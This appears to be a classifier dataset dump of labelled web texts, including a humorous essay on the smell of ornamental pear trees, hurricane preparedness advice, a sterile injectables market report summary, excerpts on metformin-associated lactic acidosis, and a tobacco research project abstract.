content
stringlengths 254
641k
| pred_label
stringclasses 1
value | pred_score
float64 0.5
1
|
|---|---|---|
You know the smell. It's that chlorine musk that reminds you of either narrowly dodging a pregnancy or being a 15-year-old boy. But it's a weird thing to be walking down the street on an early spring afternoon and get a nose full of jizz. You're looking around like, "What
is that?"
The answer is trees. That cummy smell comes from a flowering deciduous tree called
Pyrus calleryana, better known in Australia as the ornamental pear. Originating from China, they became the urban designer's tree of choice in the 1950s because they're small, neat, and produce cute white flowers. Ornamental pears now line city streets around the globe, although they've fallen out of fashion in Australia because they tend to self-germinate in vacant blocks—and as mentioned—the jizz thing.
So what's with the smell? Basically they smell like that to attract insects. "Any time plants emit fragrances, it's typically to attract pollinators, and that's what the pear is doing as well," explained John Murgel, a horticulturist in Denver. "We normally associate sweet smells with trying to attract bees, but a lot of plants all over the world use really terrible smells in order to attract beetles and flies as pollinators."
In the world of chemistry these smells are known as "volatile amines," which basically mean they're molecularly similar to ammonia. In the case of the ornamental pear, what you're smelling is trimethylamine and dimethylamine, both of which smell like ammonia. And the twist in the story is that there's ammonia in semen.
And just because we're here, talking about semen, I want to raise something personal for a moment. And that is how whenever anyone brings up semen trees, some sort of dude always invariably says, "Hahahaha, how do you know what semen smells like?"
You might have experienced this yourself. But I just want to quickly clarify that of all people, those dudes know
exactly what semen smells like. And they know because they all spent long, fevered years exploring, and I know this because I was there, being one of them. For many of us, semen was a phase. And there was an even stranger phase when some guys in high school were tasting their own, just to see. I never went that far but I guess it's nice to keep as an option. Just for when I'm old and I've tried every other activity on the planet, including zorbing.
Anyway, the point is don't ask that question. It's dumb, and you already know the answer.
Now, back to the trees. And it's worth noting that smelly plants are fairly common. There's an entire subset of stinky plants called carrion flowers, or corpse flowers, which mimic the stench of decay to attract bugs that usually feast on rotting animals. Indonesia has produced many of the favourites, including
Amorphophallus titanum, which has a long proboscis-like structure that heats up to further disperse its smell. Another example is the Bulbophyllum, which is a kind of orchid found throughout Latin America and the Asian Pacific. These guys are beautiful, but their scent is said to range from urine and blood, all the way through to something sweet and fruity.
Closer to home now, and the good news is that ornamental pear trees won't stink for that much longer. As John Murgel explained, most bloom for just two weeks. "And if a tree is in a warmer, exposed site, it could already be flowering."
So enjoy them while you still can. Like memories of adolescence, the smell of semen trees is fleeting.
Julian is on Twitter, if you're into that kind of thing
|
__label__pos
| 0.797026
|
On June 1, the hurricane season began in the Western Hemisphere. Every year, a number of named storms affect the eastern and southern coasts of the United States. My experience in public safety has taught me that there are three phases of every landfalling storm: before, during and after. I could probably write an article on each phase, but I will try to give some key points on each of these three phases.
Before the Storm The fire service works in operational periods of time leading up to a landfalling storm. There are certain things that need to be checked in each operational period that may be needed during the storm. A few examples of the things that are checked or operated are emergency generators, station fuel levels and chain saws. I think that many people take preparatory steps before a landfalling storm, but I doubt that we take a planned approach. The first order of business would be to determine what needs to be done before the storm arrives: things like filling gas tanks and gas cans, checking generators, stocking up on non-perishable foods and drinking water, procuring batteries for flash lights, making sure that propane tanks are full and ensuring that medical patients have what they need. It is important to heed warnings by weather and local officials prior to the storm. The steps taken before the storm should be done while conditions are calm, the power is still on, the wind is calm and the torrential rain is not yet falling. If you think that you will need something after the storm, then you will want to acquire it before the storm. You will also need to secure loose items from being blown around. During the Storm Once the storm has hit, shelter in place. Most storms might contain three dangerous issues: flooding rains, damaging sustained winds and tornadoes. If you live near the coast, then you will need to be concerned about storm surges, especially around high tides. Some storms may be more of a rain event, while others may be more of a wind event, and some contain both. Listening to and heeding the warnings issued might just save your life. If you are given the order to evacuate, do so. An evacuation plan should be determined prior to the storm’s arrival. Do not go outside to look at the storm’s fury. Many have been hurt or killed by falling tree branches or trees. If power lines come down, treat them as energized. Know where you will go in your home if a tornado warning is issued. If tornadoes are forecast, then people living in mobile homes must have an evacuation location to go to. After the Storm The period after the storm could last for two to three weeks. Infrastructure may be damaged. How will you live if the power is off three days? How about seven or 14 days? How will you prevent your generator exhaust from building up lethal levels of carbon monoxide? Trees could be wrapped with power lines. Roads may be blocked or washed out. Do not drive through water running across a roadway. Many people are hurt using chain saws and ladders after storms. If evacuated, then stay out until conditions have been rendered safe. Patience will be key in dealing with the aftermath of a landfalling storm. Neighbors will need to help neighbors, especially if you have elderly neighbors. Fire units, ambulances and police officers may be delayed due to blocked access or high call loads. One may have to live without creature comforts for an extended period of time. Steps taken before the storm may benefit after the storm. I remember the days after Hurricane Isabel when one could not find a chain saw to buy for 100 miles. Looking at the storm through the lens presented here may help people better survive the storm.
|
__label__pos
| 0.57949
|
For a long time, the cure for diabetes type 1 and type 2 has relied on agonizing insulin shots for patients or insulin infusion via mechanical pumps. Regarding this, experts have been creating artificial pancreatic beta cells with the he…
In this report, LP Information covers the present scenario (with the base year being 2017) and the growth prospects of global Generic Sterile Injectable market for 2018-2023.
The generic sterile injectable are FDA approved biologics that are used for the treatment of many diseases and disorders in the vast arena of the healthcare industry. The generic sterile injectable are very inexpensive as compared to that of their branded counterparts of these drugs and performs equally well. Thus, these Injectables are heavily in demand all the time and are used in majority of hospitals and clinics across the globe. However, due to the stringent FDA regulations for the production of these injectable, the rigorous demand satisfaction of these injectable has always been a constant challenge for the key players in the global generic sterile injectable market.
The generic sterile injectable market is expected to gain steady traction in the foreseeable future as the sterile injectable products find its application across a wide number of diseases and medical condition. Manufacturers are focused on increasing the production of generic sterile injectable to meet the rising demands without compromising on the quality of the injectable.
Over the next five years, LPI(LP Information) projects that Generic Sterile Injectable will register a xx% CAGR in terms of revenue, reach US$ xx million by 2023, from US$ xx million in 2017.
This report presents a comprehensive overview, market shares, and growth opportunities of Generic Sterile Injectable market by product type, application, key manufacturers and key regions.
To calculate the market size, LP Information considers value and volume generated from the sales of the following segments:
Segmentation by product type:
- Monoclonal Antibodies
- Cytokines
- Insulin
- Peptide Hormones
- Vaccines
- Others
Segmentation by application:
- Hospitals
- Pharmacies
- Online Pharmacies
This report also splits the market by region:
- Americas
- - United States
- - Canada
- - Mexico
- - Brazil
- APAC
- - China
- - Japan
- - Korea
- - Southeast Asia
- - India
- - Australia
- Europe
- - Germany
- - France
- - UK
- - Italy
- - Russia
- - Spain
- Middle East & Africa
- - Egypt
- - South Africa
- - Israel
- - Turkey
- - GCC Countries
The report also presents the market competition landscape and a corresponding detailed analysis of the major vendor/manufacturers in the market. The key manufacturers covered in this report:
- 3M
- Baxter Inc
- Fresenius Kabi
- Pfizer/Hospira
- Novartis/Sandoz
- Teva
- Hikma
- Sun Pharma
- Dr. Reddy's
- Mylan
- AstraZeneca Plc
- Merck & Co., Inc
- Hellberg Safety Ab
In addition, this report discusses the key drivers influencing market growth, opportunities, the challenges and the risks faced by key manufacturers and the market as a whole. It also analyzes key emerging trends and their impact on present and future development.
Research objectives
- To study and analyze the global Generic Sterile Injectable consumption (value & volume) by key regions/countries, product type and application, history data from 2013 to 2017, and forecast to 2023.
- To understand the structure of Generic Sterile Injectable market by identifying its various subsegments.
- Focuses on the key global Generic Sterile Injectable manufacturers, to define, describe and analyze the sales volume, value, market share, market competition landscape, SWOT analysis and development plans in next few years.
- To analyze the Generic Sterile Injectable with respect to individual growth trends, future prospects, and their contribution to the total market.
- To share detailed information about the key factors influencing the growth of the market (growth potential, opportunities, drivers, industry-specific challenges and risks).
- To project the consumption of Generic Sterile Injectable submarkets, with respect to key regions (along with their respective key countries).
- To analyze competitive developments such as expansions, agreements, new product launches, and acquisitions in the market.
- To strategically profile the key players and comprehensively analyze their growth strategies.
|
__label__pos
| 0.868617
|
Review Metformin-associated Lactic Acidosis: Current Perspectives On Causes And Risk
Abstract Although metformin has become a drug of choice for the treatment of type 2 diabetes mellitus, some patients may not receive it owing to the risk of lactic acidosis. Metformin, along with other drugs in the biguanide class, increases plasma lactate levels in a plasma concentration-dependent manner by inhibiting mitochondrial respiration predominantly in the liver. Elevated plasma metformin concentrations (as occur in individuals with renal impairment) and a secondary event or condition that further disrupts lactate production or clearance (e.g., cirrhosis, sepsis, or hypoperfusion), are typically necessary to cause metformin-associated lactic acidosis (MALA). As these secondary events may be unpredictable and the mortality rate for MALA approaches 50%, metformin has been contraindicated in moderate and severe renal impairment since its FDA approval in patients with normal renal function or mild renal insufficiency to minimize the potential for toxic metformin levels and MALA. However, the reported incidence of lactic acidosis in clinical practice has proved to be very low (< 10 cases per 100,000 patient-years). Several groups have suggested that current renal function cutoffs for metformin are too conservative, thus depriving a substantial number of type 2 diabetes patients from the potential benefit of metformin therapy. On the other hand, the success of metformin as the first-line diabetes therapy may be a direct consequence of conservative labeling, the absence of which could have led to excess patient risk and eventual withdrawal from the market, as happened with earlier biguanide therapies. An investigational delayed-release metformin currently under development could potentially provide a treatment option for patients with renal impairment pending the resu Continue reading >>
The role of bariatric surgery to treat diabetes: current challenges and perspectives Exercise and Glucose Metabolism in Persons with Diabetes Mellitus: Perspectives on the Role for Continuous Glucose Monitoring Evaluating Adherence to Dilated Eye Examination Recommendations Among Patients with Diabetes, Combined with Patient and Provider Perspectives Lactic Acidosis: What You Need To Know
Lactic acidosis is a form of metabolic acidosis that begins in the kidneys. People with lactic acidosis have kidneys that are unable to remove excess acid from their body. If lactic acid builds up in the body more quickly than it can be removed, acidity levels in bodily fluids — such as blood — spike. This buildup of acid causes an imbalance in the body’s pH level, which should always be slightly alkaline instead of acidic. There are a few different types of acidosis. Lactic acid buildup occurs when there’s not enough oxygen in the muscles to break down glucose and glycogen. This is called anaerobic metabolism. There are two types of lactic acid: L-lactate and D-lactate. Most forms of lactic acidosis are caused by too much L-lactate. Lactic acidosis has many causes and can often be treated. But if left untreated, it may be life-threatening. The symptoms of lactic acidosis are typical of many health issues. If you experience any of these symptoms, you should contact your doctor immediately. Your doctor can help determine the root cause. Several symptoms of lactic acidosis represent a medical emergency: fruity-smelling breath (a possible indication of a serious complication of diabetes, called ketoacidosis) confusion jaundice (yellowing of the skin or the whites of the eyes) trouble breathing or shallow, rapid breathing If you know or suspect that you have lactic acidosis and have any of these symptoms, call 911 or go to an emergency room right away. Other lactic acidosis symptoms include: exhaustion or extreme fatigue muscle cramps or pain body weakness overall feelings of physical discomfort abdominal pain or discomfort diarrhea decrease in appetite headache rapid heart rate Lactic acidosis has a wide range of underlying causes, including carbon monoxide poisoni Continue reading >>
Severe Lactic Acidosis Reversed By Thiamine Within 24 Hours
Severe lactic acidosis reversed by thiamine within 24 hours 1Department of Internal Medicine, Medical University of Graz, Auenbruggerplatz 15, A-8036 Graz, Austria Karin Amrein: [email protected] ; Werner Ribitsch: [email protected] ; Ronald Otto: [email protected] ; Harald C Worm: [email protected] ; Rudolf E Stauber: [email protected] This article has been cited by other articles in PMC. Thiamine is a water-soluble vitamin that plays a pivotal role in carbohydrate metabolism. In acute deficiency, pyruvate accumulates and is metabolized to lactate, and chronic deficiency may cause polyneuropathy and Wernicke encephalopathy. Classic symptoms include mental status change, ophthalmoplegia, and ataxia but are present in only a few patients [ 1 ]. Critically ill patients are prone to thiamine deficiency because of preexistent malnutrition, increased consumption in high-carbohydrate nutrition, and accelerated clearance in renal replacement. In retrospective [ 2 ] and prospective [ 3 , 4 ] studies, a substantial prevalence of thiamine deficiency has been described in both adult (10% to 20%) and pediatric (28%) patients. Thiamine deficiency may become clinically evident in any type of malnutrition that outlasts thiamine body stores (2 to 3 weeks), including alcoholism, bariatric surgery, or hyperemesis gravidarum, and results in high morbidity and mortality if untreated [ 1 ]. We report the case of a 56-year-old man with profound lactic acidosis that resolved rapidly after thiamine infusion. He was admitted because of a decreased level of consciousness (Glasgow Coma Scale score of 6). Vital signs, including blood pressure, heart rate, and oxygen saturation, were normal. Besides reporting regular alcohol consumption, relatives reported recen Continue reading >>
Mala: Metformin-associated Lactic Acidosis
By Charles W. O’Connell, MD Introduction Metformin is a first-line agent for type 2 diabetes mellitus often used as monotherapy or in combination with oral diabetic medications. It is a member of the biguanide class and its main intended effect is expressed by the inhibition of hepatic gluconeogenesis. In addition, metformin increases insulin sensitivity, enhances peripheral glucose utilization and decreases glucose uptake in the gastrointestinal tract. Phenformin, a previously used biguanide, as withdrawn from the market in the 1970’s due its association with numerous cases of lactic acidosis. Metformin is currently used extensively in the management of diabetes and is the most commonly prescribed biguanide worldwide. The therapeutic dosage of metformin ranges from 850 mg to a maximum of 3000 mg daily and is typically divided into twice daily dosing. It is primarily used in the treatment of diabetes but has been used in other conditions associated with insulin resistance such as polycystic ovarian syndrome. MALA is a rare but well reported event that occurs with both therapeutic use and overdose states. Case presentation A 22-year-old female presents to the Emergency Department after being found alongside a suicide note by her family. She was thought to have taken an unknown, but large amount of her husband’s metformin. She arrives at the ED nearly 10 hours after ingestion. She was agitated, but conversant. She reports having nausea and vague feelings of being unwell and is very distraught over the state of her critically ill husband. She has some self-inflicted superficial lacerations over her left anterior forearm. Her vital assigns upon arrival were: T 98.9 degrees Fahrenheit, HR initially 140 bpm which improved to 110 bpm soon after arrival, BP 100/50, RR 22, Continue reading >>
Causes Of Lactic Acidosis
INTRODUCTION AND DEFINITION Lactate levels greater than 2 mmol/L represent hyperlactatemia, whereas lactic acidosis is generally defined as a serum lactate concentration above 4 mmol/L. Lactic acidosis is the most common cause of metabolic acidosis in hospitalized patients. Although the acidosis is usually associated with an elevated anion gap, moderately increased lactate levels can be observed with a normal anion gap (especially if hypoalbuminemia exists and the anion gap is not appropriately corrected). When lactic acidosis exists as an isolated acid-base disturbance, the arterial pH is reduced. However, other coexisting disorders can raise the pH into the normal range or even generate an elevated pH. (See "Approach to the adult with metabolic acidosis", section on 'Assessment of the serum anion gap' and "Simple and mixed acid-base disorders".) Lactic acidosis occurs when lactic acid production exceeds lactic acid clearance. The increase in lactate production is usually caused by impaired tissue oxygenation, either from decreased oxygen delivery or a defect in mitochondrial oxygen utilization. (See "Approach to the adult with metabolic acidosis".) The pathophysiology and causes of lactic acidosis will be reviewed here. The possible role of bicarbonate therapy in such patients is discussed separately. (See "Bicarbonate therapy in lactic acidosis".) PATHOPHYSIOLOGY A review of the biochemistry of lactate generation and metabolism is important in understanding the pathogenesis of lactic acidosis [1]. Both overproduction and reduced metabolism of lactate appear to be operative in most patients. Cellular lactate generation is influenced by the "redox state" of the cell. The redox state in the cellular cytoplasm is reflected by the ratio of oxidized and reduced nicotine ad Continue reading >>
Metformin-related Lactic Acidosis: Case Report - Sciencedirect
Open Access funded by Sociedad Colombiana de Anestesiologa y Reanimacin Lactic acidosis is defined as the presence of pH <7.35, blood lactate >2.0mmol/L and PaCO2 <42mmHg. However, the definition of severe lactic acidosis is controversial. The primary cause of severe lactic acidosis is shock. Although rare, metformin-related lactic acidosis is associated with a mortality as high as 50%. The treatment for metabolic acidosis, including lactic acidosis, may be specific or general, using sodium bicarbonate, trihydroxyaminomethane, carbicarb or continuous haemodiafiltration. The successful treatment of lactic acidosis depends on the control of the aetiological source. Intermittent or continuous renal replacement therapy is perfectly justified, shock being the argument for deciding which modality to use. We report a case of a male patient presenting with metformin poisoning as a result of attempted suicide, who developed lactic acidosis and multiple organ failure. The critical success factor was treatment with continuous haemodiafiltration. Definimos acidosis lctica en presencia de pH <7.35, lactato en sangre >2.0mmol/L y PaCO2 <42mmHg. Por otro lado, la definicin de acidosis lctica grave es controvertida. La causa principal de acidosis lctica grave es el estado de choque. La acidosis lctica por metformina es rara pero alcanza mortalidad del 50%. La acidosis metablica incluyendo a la acidosis lctica puede recibir tratamiento especfico o tratamiento general con bicarbonato de sodio, trihidroxiaminometano, carbicarb o hemodiafiltracin continua. El xito del tratamiento de la acidosis lctica yace en el control de la fuente etiolgica; la terapia de reemplazo renal intermitente o continua est perfectamente justificada, donde el argumento para decidir cul utilizar ser el estado de Continue reading >>
Lactic Acidosis In Sepsis: It's Not All Anaerobic: Implications For Diagnosis Andmanagement.
1. Chest. 2016 Jan;149(1):252-61. doi: 10.1378/chest.15-1703. Epub 2016 Jan 6. Lactic Acidosis in Sepsis: It's Not All Anaerobic: Implications for Diagnosis andManagement. (1)Centre for Heart Lung Innovation, University of British Columbia, Vancouver, BC, Canada. (2)Centre for Heart Lung Innovation, University of British Columbia, Vancouver, BC, Canada. Electronic address: [email protected] Increased blood lactate concentration (hyperlactatemia) and lactic acidosis(hyperlactatemia and serum pH< 7.35) arecommon in patients with severe sepsisorseptic shock and are associated with significant morbidity and mortality. Insome patients, most of the lactate that is produced in shock states is due toinadequate oxygen delivery resulting in tissue hypoxia and causing anaerobicglycolysis. However, lactate formation during sepsis is not entirely related totissue hypoxia or reversible by increasing oxygen delivery. In this review,weinitially outline the metabolism of lactateand etiology of lactic acidosis;we thenaddress the pathophysiology of lacticacidosis in sepsis. We discuss the clinical implications of serum lactate measurement in diagnosis, monitoring, and prognostication in acute and intensive care settings. Finally, we exploretreatment of lactic acidosis and its impact on clinical outcome.Copyright 2016 American College of Chest Physicians. Published by Elsevier Inc.All rights reserved. Continue reading >>
Lactic Acidosis: Symptoms, Causes, And Treatment
Lactic acidosis occurs when the body produces too much lactic acid and cannot metabolize it quickly enough. The condition can be a medical emergency. The onset of lactic acidosis might be rapid and occur within minutes or hours, or gradual, happening over a period of days. The best way to treat lactic acidosis is to find out what has caused it. Untreated lactic acidosis can result in severe and life-threatening complications. In some instances, these can escalate rapidly. It is not necessarily a medical emergency when caused by over-exercising. The prognosis for lactic acidosis will depend on its underlying cause. A blood test is used to diagnose the condition. Lactic acidosis symptoms that may indicate a medical emergency include a rapid heart rate and disorientaiton. Typically, symptoms of lactic acidosis do not stand out as distinct on their own but can be indicative of a variety of health issues. However, some symptoms known to occur in lactic acidosis indicate a medical emergency. Lactic acidosis can occur in people whose kidneys are unable to get rid of excess acid. Even when not related to just a kidney condition, some people's bodies make too much lactic acid and are unable to balance it out. Diabetes increases the risk of developing lactic acidosis. Lactic acidosis may develop in people with type 1 and 2 diabetes mellitus , especially if their diabetes is not well controlled. There have been reports of lactic acidosis in people who take metformin, which is a standard non-insulin medication for treating type 2 diabetes mellitus. However, the incidence is low, with equal to or less than 10 cases per 100,000 patient-years of using the drug, according to a 2014 report in the journal Metabolism. The incidence of lactic acidosis is higher in people with diabetes who Continue reading >>
Metformin And Fatal Lactic Acidosis
Publications Published: July 1998 Information on this subject has been updated. Read the most recent information. Dr P Pillans,former Medical Assessor, Centre for Adverse Reactions Monitoring (CARM), Dunedin Metformin is a useful anti-hyperglycaemic agent but significant mortality is associated with drug-induced lactic acidosis. Significant renal and hepatic disease, alcoholism and conditions associated with hypoxia (eg. cardiac and pulmonary disease, surgery) are contraindications to the use of metformin. Other risk factors for metformin-induced lactic acidosis are sepsis, dehydration, high dosages and increasing age. Metformin remains a major reported cause of drug-associated mortality in New Zealand. Of the 12 cases of lactic acidosis associated with metformin reported to CARM since 1977, 2 occurred in the last year and 8 cases had a fatal outcome. Metformin useful but small risk of potentially fatal lactic acidosis Metformin is a useful therapeutic agent for obese non-insulin dependent diabetics and those whose glycaemia cannot be controlled by sulphonylurea monotherapy. Lactic acidosis is an uncommon but potentially fatal adverse effect. The reported frequency of lactic acidosis is 0.06 per 1000 patient-years, mostly in patients with predisposing factors.1 Examples of metformin-induced lactic acidosis cases reported to CARM include: A 69-year-old man, with renal and cardiac disease, was prescribed metformin due to failing glycaemic control on glibenclamide monotherapy. He was well for six weeks, then developed lactic acidosis and died within 3 days. Post-surgical lactic acidosis caused the death of a 70-year-old man whose metformin was not withdrawn at the time of surgery. A 56-year-old woman, with no predisposing disease, died from lactic acidosis following major Continue reading >>
Glyburide And Metformin (oral Route)
Precautions Drug information provided by: Micromedex It is very important that your doctor check your progress at regular visits to make sure this medicine is working properly. Blood tests may be needed to check for unwanted effects. Under certain conditions, too much metformin can cause lactic acidosis. The symptoms of lactic acidosis are severe and quick to appear. They usually occur when other health problems not related to the medicine are present and very severe, such as a heart attack or kidney failure. The symptoms of lactic acidosis include abdominal or stomach discomfort; decreased appetite; diarrhea; fast, shallow breathing; a general feeling of discomfort; muscle pain or cramping; and unusual sleepiness, tiredness, or weakness. If you have any symptoms of lactic acidosis, get emergency medical help right away. It is very important to carefully follow any instructions from your health care team about: Alcohol—Drinking alcohol may cause severe low blood sugar. Discuss this with your health care team. Other medicines—Do not take other medicines unless they have been discussed with your doctor. This especially includes nonprescription medicines such as aspirin, and medicines for appetite control, asthma, colds, cough, hay fever, or sinus problems. Counseling—Other family members need to learn how to prevent side effects or help with side effects if they occur. Also, patients with diabetes may need special counseling about diabetes medicine dosing changes that might occur because of lifestyle changes, such as changes in exercise and diet. Furthermore, counseling on contraception and pregnancy may be needed because of the problems that can occur in patients with diabetes during pregnancy. Travel—Keep your recent prescription and your medical history with yo Continue reading >>
Lactic Acidosis: Diagnosis And Treatment
Measurements of blood lactate levels can be very useful for detecting the presence of tissue underperfusion and for guiding therapy. Increased blood lactate levels usually reflect an imbalance between the oxygen demand and the oxygen supply to the cells, but other conditions may also be responsible. The present chapter first reviews the biochemistry of blood lactate, then reviews the clinical conditions associated with hyperlactatemia and finally discusses some therapeutic implications. Septic ShockBlood LactateLactate LevelLactic AcidosisBlood Lactate Level These keywords were added by machine and not by the authors. This process is experimental and the keywords may be updated as the learning algorithm improves. This is a preview of subscription content, log in to check access Unable to display preview. Download preview PDF. Zhang H, Vincent JL (1993) Arteriovenous differences in PCO2 and pH are good indicators of critical hypoperfusion. Am Rev Respir Dis 148:867871 PubMed CrossRef Google Scholar Iberti TJ, Leibowitz AB, Papadakos PJ et al (1990) Low sensitivity of the anion gap as a screen to detect hyperlactatemia in critically ill patients. Crit Care Med 18:275277 PubMed CrossRef Google Scholar Poortmans JR, Bossche JD, Leclercq R (1978) Lactate uptake by inactive forearm during progressive leg exercise. J Appl Pysiol 45:835839 Google Scholar Freyschuss U, Strandell T (1967) Limb circulation during arm and leg exercise in supine position. J Appl Physiol 23:163170 PubMed Google Scholar Watt PW, MacLennan PA, Hundai HS et al (1988) L(+)-Lactate transport in perfused rat skeletal muscle: kinetic characteristics and sensitivity to pH and transport inhibitors. Biochem Biophys Acta 944:213222 PubMed CrossRef Google Scholar Graham TE, Barclay JK, Wilson BA (1986) Skeletal Continue reading >>
Diagnosis and treatment of diabetes mellitus in chronic pancreatitis Genetic findings in 'type 1.5' diabetes may shed light on better diagnosis, treatment Relative effectiveness of insulin pump treatment over multiple daily injections and structured education during flexible intensive insulin treatment for type 1 diabetes: cluster randomised trial (REPOSE) Lactic Acidosis And Exercise: What You Need To Know
Muscle ache, burning, rapid breathing, nausea, stomach pain: If you've experienced the unpleasant feeling of lactic acidosis, you likely remember it. It's temporary. It happens when too much acid builds up in your bloodstream. The most common reason it happens is intense exercise. Symptoms The symptoms may include a burning feeling in your muscles, cramps, nausea, weakness, and feeling exhausted. It's your body's way to tell you to stop what you're doing The symptoms happen in the moment. The soreness you sometimes feel in your muscles a day or two after an intense workout isn't from lactic acidosis. It's your muscles recovering from the workout you gave them. Intense Exercise. When you exercise, your body uses oxygen to break down glucose for energy. During intense exercise, there may not be enough oxygen available to complete the process, so a substance called lactate is made. Your body can convert this lactate to energy without using oxygen. But this lactate or lactic acid can build up in your bloodstream faster than you can burn it off. The point when lactic acid starts to build up is called the "lactate threshold." Some medical conditions can also bring on lactic acidosis, including: Vitamin B deficiency Shock Some drugs, including metformin, a drug used to treat diabetes, and all nucleoside reverse transcriptase inhibitor (NRTI) drugs used to treat HIV/AIDS can cause lactic acidosis. If you are on any of these medications and have any symptoms of lactic acidosis, get medical help immediately. Preventing Lactic Acidosis Begin any exercise routine gradually. Pace yourself. Don't go from being a couch potato to trying to run a marathon in a week. Start with an aerobic exercise like running or fast walking. You can build up your pace and distance slowly. Increase the Continue reading >>
Life Threatening Lactic Acidosis
M Lemyze, specialist registrar in critical care medicine 1 , J F Baudry, specialist registrar in critical care medicine 2 , F Collet, specialist registrar in critical care medicine 2 , N Guinard, specialist registrar in critical care medicine 2 1Department of Critical Care Medicine, Schaffner Hospital, 62300 Lens, France 2Department of Critical Care Medicine, Broussais Hospital, 35400 Saint Malo, France Correspondence to: M Lemyze malcolmlemyze{at}yahoo.fr An 83 year old woman with diabetes presented to the emergency department with progressive shortness of breath and a two week history of diarrhoea. Her drugs included aspirin, 75 mg four times a day; a combination of irbesartan with hydrochlorothiazide, 300/25 mg four times a day; and metformin, 1000 mg three times a day. She had no previously known renal insufficiency, but on arrival she was oliguric, disoriented, and confused. Her respiratory rate was 32 breaths/min, blood pressure was 76/46 mm Hg, heart rate was 125 beats/min, and rectal temperature reached 36.8C. She had cool and clammy extremities and a persistent skinfoldadditional evidence of severe dehydration. Arterial blood gases showed a profound lactic acidosis, with pH 6.72, partial pressure of carbon dioxide (PCO2) 14 mm Hg, partial pressure of oxygen (PO2) 106 mm Hg, bicarbonate 12 mmol/l, and a high lactate concentration of 17.4 mmol/l. Laboratory results showed a normal blood glucose concentration of 9 mmol/l, a serum urea of 22 mmol/l, a serum creatinine of 779 mol/l, an increased serum potassium concentration of 6.8 mmol/l, and a decreased prothrombin activity of 43% (prothrombin time of 21 seconds). Chest and abdominal examination, chest radiography, urine dipstick, plasma C reactive protein (<5 mg/l), and procalcitonin (<0.5 g/l) concentrations sh Continue reading >>
Differential Diagnosis Of Elevated Serum Lactate 1,2
Sinus tachycardia, LVH, secondary repolarization abnormalities No evidence of central pulmonary embolism, thoracic aortic dissection, or thoracic aortic aneurysm. Evaluation of the peripheral vessels is limited due to motion artifact. No focal consolidation or pneumothorax. No evidence of intra-abdominal abscess or definite source of infection. Marked hepatic steatosis. Diffuse circumferential subcutaneous edema involving both lower extremities from the level of the mid thighs distally through the feet. There are bilateral subcutaneous calcifications which are likely venous calcifications in the setting of chronic venous stasis disease. There is some overlying skin thickening. There is moderate concentric left ventricular hypertrophy with hyperdynamic LV wall motion. The Ejection Fraction estimate is >70%. Grade I/IV (mild) LV diastolic dysfunction. No hemodynamically significant valve abnormalities. Hepatomegaly, echogenic liver suggesting fatty infiltration. Moderately blunted hepatic vein waveforms suggesting decreased hepatic parenchymal compliance. The patient was admitted to the cardiology service for management of NSTEMI and evaluation of undiagnosed CHF. She was started on a heparin continuous infusion. In addition, a CT pulmonary angiogram was obtained to evaluate for pulmonary embolism as an explanation of her progressive dyspnea on exertion. No PE, consolidation or effusion was identified. Despite the patients reported history of congestive heart failure, there was no evidence that her symptoms were a result of an acute exacerbation with only a mildly elevated BNP but no jugular venous distension or evidence of pulmonary edema. The patients significant lower extremity edema was more suggestive of chronic venous stasis. One notable laboratory abnormality that Continue reading >>
Lactic Acidosis
Lactic acidosis is a medical condition characterized by the buildup of lactate (especially L-lactate) in the body, which results in an excessively low pH in the bloodstream. It is a form of metabolic acidosis, in which excessive acid accumulates due to a problem with the body's metabolism of lactic acid. Lactic acidosis is typically the result of an underlying acute or chronic medical condition, medication, or poisoning. The symptoms are generally attributable to these underlying causes, but may include nausea, vomiting, rapid deep breathing, and generalised weakness. The diagnosis is made on biochemical analysis of blood (often initially on arterial blood gas samples), and once confirmed, generally prompts an investigation to establish the underlying cause to treat the acidosis. In some situations, hemofiltration (purification of the blood) is temporarily required. In rare chronic forms of lactic acidosis caused by mitochondrial disease, a specific diet or dichloroacetate may be used. The prognosis of lactic acidosis depends largely on the underlying cause; in some situations (such as severe infections), it indicates an increased risk of death. Classification[edit] The Cohen-Woods classification categorizes causes of lactic acidosis as:[1] Type A: Decreased tissue oxygenation (e.g., from decreased blood flow) Type B B1: Underlying diseases (sometimes causing type A) B2: Medication or intoxication B3: Inborn error of metabolism Signs and symptoms[edit] Lactic acidosis is commonly found in people who are unwell, such as those with severe heart and/or lung disease, a severe infection with sepsis, the systemic inflammatory response syndrome due to another cause, severe physical trauma, or severe depletion of body fluids.[2] Symptoms in humans include all those of typical m Continue reading >>
|
__label__pos
| 0.882473
|
2018 Pilot Projects Understanding the Factors Influencing Exposures from Tobacco Usage among Young Adults in the Minority Communities Principal Investigator: Hsu, Ping-Ching, Ph.D., M.S.
Young adults (YA) aged 18-26 have the highest rate of trying new and emerging tobacco products such as electronic nicotine delivery systems (ENDS). Dual use of ENDS with other tobacco products such as cigarettes and smokeless tobacco (ST) is common among YAs, who are at the critical stage in the development of regular tobacco use behavior. Dual use can increase the abuse liability of tobacco products, prolong frequency and intensity of use, and increase exposure to tobacco toxins. However, there is limited understanding of how individual factors such as nicotine dependence, smoking topography, and nicotine metabolism influence nicotine intake and exposure to tobacco toxins in YAs, particularly among those who live in rural Southern communities where smoking-attributable cancers are among the highest in the U.S. Our long-term goal is to generate innovative data that will inform tobacco regulatory policy related to how dual user consumption patterns influence toxicant exposure. Consistent with the Arkansas Center for Health Disparities (ARCHD) theme, the specific goal of this study is to investigate individual factors that will influence tobacco use behavior among socially disadvantaged YA who live in the Arkansas Phillips County where 62% of the population are African Americans. This study will use social network and community-engaged research methods to recruit traditionally hard-to-reach underserved YAs. We hypothesize that YAs who use multiple products (e.g., cig+ENDS or cig+ST) will have higher nicotine dependence than single users, resulting in longer and deeper puff profiles and greater toxicant exposures than single users. This study includes vulnerable populations defined by the Food and Drug Administration (minorities, YA, poor, and geographically isolated group), which has expressed an interest in better understanding how to reduce the toxicity and carcinogenicity of tobacco products. Therefore, we have the potential to have a huge impact on addressing tobacco-caused disparities.
Our aims are to: Aim 1.Evaluate the smoking topography and nicotine dependence for YA smokers, ST, ENDS, and dual users. Aim 2.Determine the differences in the toxicant exposure in saliva using targeted metabolomics, as well as the nicotine metabolic ratio for the above groups. Cytogenetic and Epigenetic Alterations as a Result of Exposure to Ionizing Radiation in Northwest Arkansas Marshallese Principal Investigator, Igor Koturbash, M.D., Ph.D
